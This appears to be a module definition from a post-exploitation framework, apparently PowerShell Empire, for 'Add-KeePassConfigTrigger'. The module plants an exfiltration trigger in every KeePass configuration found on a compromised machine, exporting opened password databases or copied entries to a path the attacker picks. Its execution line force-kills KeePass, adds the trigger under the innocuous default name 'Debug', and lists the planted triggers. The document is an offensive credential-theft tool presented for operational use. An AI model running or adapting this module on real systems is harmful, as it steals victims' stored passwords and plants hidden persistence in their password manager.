name: Add-KeePassConfigTrigger
authors:
  - name: Lee Christensen
    handle: '@tifkin_'
    link: https://twitter.com/tifkin_
  - name: Will Schroeder
    handle: '@harmj0y'
    link: https://twitter.com/harmj0y
description: This module adds a KeePass exfiltration trigger to all KeePass configs found by Find-KeePassConfig.
software: ''
tactics: []
techniques:
  - T1119
background: true
output_extension: ''
needs_admin: false
opsec_safe: false
language: powershell
min_language_version: '2'
comments:
  - https://github.com/adaptivethreat/KeeThief
options:
  - name: Agent
    description: Agent to run the module on.
    required: true
    value: ''
  - name: Action
    description: "'ExportDatabase' (export opened databases to $ExportPath) or 'ExfilDataCopied' (export copied data to $ExportPath)."
    required: true
    value: ExportDatabase
  - name: ExportPath
    description: The path to export data to, defaults to %APPDATA%\KeePass\
    required: false
    value: ''
  - name: TriggerName
    description: The name for the trigger.
    required: true
    value: Debug
  - name: OutputFunction
    description: PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
    required: false
    value: Out-String
    strict: false
    suggested_values:
      - Out-String
      - ConvertTo-Json
      - ConvertTo-Csv
      - ConvertTo-Html
      - ConvertTo-Xml
script_path: collection/vaults/KeePassConfig.ps1
script_end: Get-Process *keepass* | Stop-Process -Force; Find-KeePassconfig | Add-KeePassConfigTrigger {{ PARAMS }}; Find-KeePassconfig
  | Get-KeePassConfigTrigger | Format-List | {{ OUTPUT_FUNCTION }} | %{$_ + "`n"}; 'Add-KeePassConfigTrigger completed'
